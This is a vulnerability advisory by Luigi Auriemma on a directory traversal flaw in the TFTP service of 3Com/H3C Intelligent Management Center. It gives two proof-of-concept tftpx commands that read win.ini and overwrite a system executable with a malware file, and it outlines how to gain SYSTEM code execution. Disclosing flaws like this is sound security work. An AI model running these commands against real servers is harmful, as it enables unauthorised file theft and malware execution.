####################################################################### Luigi Auriemma Application: 3com / H3C Intelligent Management Center (IMC) http://www.3com.com/IMC_Enterprise/ Versions: <= 3.3 SP2 R2606P13 Platforms: Windows, Linux, Solaris Bug: directory traversal in tftpserver.exe Exploitation: remote, versus server Date: probably found 18 Oct 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "3ComŽ Intelligent Management Center (IMC) Enterprise Edition is a self-contained comprehensive management solution, flexible and scalable enough to meet the needs of advanced Enterprise networks." The suite is also known under the vendors HP and H3C (the original developer). ####################################################################### ====== 2) Bug ====== tftserver.exe is a TFTP service running on UDP port 69 and available in the default configuration of IMC and uses the "server\tmp" folder located in the IMC directory as base path. This service is affected by a directory traversal vulnerability exploitable through the classical ..\ and ../ sequences that allows a remote attacker to download and upload files located on the disk where IMC is installed. The most interesting effect of this vulnerability is just the upload one because the server is configured to overwrite automatically any file (allow_overwrite=yes and overwrite_readonly=yes in tftpserver.cfg) and having SYSTEM privileges allows to do it without problems of permissions. For example an attacker could execute his malicious code by crashing one of the IMC services vulnerable to Denial of Service bugs and replacing their executable with the one of the malware so that IMC will start it automatically within some seconds. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/tftpx.zip tftpx SERVER ..\..\..\..\..\..\..\windows\win.ini output.txt tftpx -u SERVER ..\..\..\..\..\..\..\windows\system32\calc.exe malware_input.exe ####################################################################### ====== 4) Fix ====== http://www.zerodayinitiative.com/advisories/ZDI-11-161 #######################################################################